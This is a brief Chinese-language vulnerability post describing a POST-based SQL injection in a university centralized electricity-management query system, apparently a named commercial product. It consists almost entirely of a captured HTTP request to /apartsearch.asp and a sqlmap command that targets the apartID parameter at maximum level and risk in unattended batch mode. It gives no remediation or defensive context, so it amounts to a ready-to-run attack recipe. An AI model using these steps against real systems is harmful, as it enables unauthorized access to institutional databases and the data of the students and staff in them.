YH高校集中用电管理网上查询系统POST注入漏洞
1.burpsuite 抓包保存为1.txt
POST /apartsearch.asp HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://1.1.1.1/apartsearch.asp Cookie: ASPSESSIONIDASRTDRTS=FHGPKHLDGKCGBHNDIAPLLDBH DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 43 apartID=1&action=search&Submit=%CC%E1%BD%BB
2.启动sqlmap
sqlmap.py -r "c:\1.txt" -p apartID --leve 5 --risk 3 --batch